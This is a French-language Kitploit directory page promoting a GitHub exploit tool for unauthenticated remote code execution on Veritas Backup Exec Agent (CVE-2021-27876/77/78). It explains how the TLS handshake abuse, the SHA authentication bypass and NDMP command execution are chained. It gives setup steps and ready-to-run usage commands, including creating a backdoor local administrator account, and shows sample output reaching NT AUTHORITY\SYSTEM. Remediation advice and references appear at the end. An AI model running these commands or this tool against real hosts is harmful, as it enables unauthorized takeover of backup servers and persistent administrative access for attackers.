Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-27876 — Exploit RCE non authentifié pour Veritas Backup Exec Agent (CVE-2021-27876/77/78) — contournement de l'authentification SHA vers SYSTEM via NDMP | Kitploit
Outils/GitHubGitHub/wingerbijay/cve-2021-27876
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleAuthentification
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

Exploit RCE non authentifié pour Veritas Backup Exec Agent (CVE-2021-27876/77/78) — contournement de l'authentification SHA vers SYSTEM via NDMP

Voir le dépôt
11il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-27876

Exploit RCE non authentifié pour l'agent Veritas Backup Exec (CVE-2021-27876/77/78) — contournement de l'authentification SHA vers SYSTEM via NDMP

CVEs

CVEDescriptionCVSS 3.1
CVE-2021-27876Contournement de l'authentification via manipulation du hachage SHA dans le protocole NDMP9.8 Critique
CVE-2021-27877Lecture non authentifiée de fichiers arbitraires via NDMP9.8 Critique
CVE-2021-27878Exécution arbitraire de commandes OS via NDMP_EXECUTE_COMMAND9.8 Critique

Avis : Veritas VTS21-003

Versions affectées

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (révision agent ≤ 9.3)

Corrigé dans : Backup Exec 21.3 et ultérieur.


Fonctionnement

L'agent Veritas Backup Exec écoute sur TCP/10000 et parle le NDMP (Network Data Management Protocol). L'exploit enchaîne trois vulnérabilités :

  1. Abus de la poignée de main TLS — L'agent demande un CSR lors de sa négociation TLS personnalisée. L'exploit génère une CA locale, signe le CSR de l'agent et termine la poignée de main, mettant à niveau le socket vers TLS sans secret pré-partagé.

  2. Contournement de l'authentification SHA (CVE-2021-27876) — L'authentification SHA de NDMP calcule SHA256('\x00' * 64 + challenge). Étant donné que le mot de passe est ajouté comme un bloc de 64 octets remplis de zéros et qu'aucune validation côté serveur du matériel du mot de passe n'a lieu, tout client peut s'authentifier en tant qu'Administrateur sans connaître le mot de passe.

  3. NDMP_EXECUTE_COMMAND (CVE-2021-27878) — Une fois authentifié, le type de message NDMP_EXECUTE_COMMAND exécute des commandes OS arbitraires en tant que NT AUTHORITY\SYSTEM. La sortie est redirigée vers C:\Windows\Temp\_be_out.txt et lue via NDMP_FILE_READ.


Prérequis

Python 3.8+

Sur les distributions modernes, Python est marqué comme « géré en externe » (PEP 668), installez donc la dépendance dans un environnement virtuel :

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

Utilisation

python3 be_rce.py

Exemples :

root@kitploit:~
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

Exemple de sortie :

root@kitploit:~
[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

Remédiation

  • Mettez à niveau l'agent Veritas Backup Exec vers la version 21.3 ou ultérieure sur tous les hôtes
  • Restreignez TCP/10000 aux hôtes de gestion de sauvegarde autorisés via le pare-feu hôte et les ACL réseau
  • Auditez tous les hôtes exécutant l'agent Backup Exec dans votre environnement

Références

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

Légal

Cet outil est fourni uniquement pour les tests de pénétration autorisés et la recherche en sécurité. L'utiliser contre des systèmes sans autorisation écrite explicite est illégal. L'auteur n'accepte aucune responsabilité en cas d'utilisation abusive.

Télécharger l’outil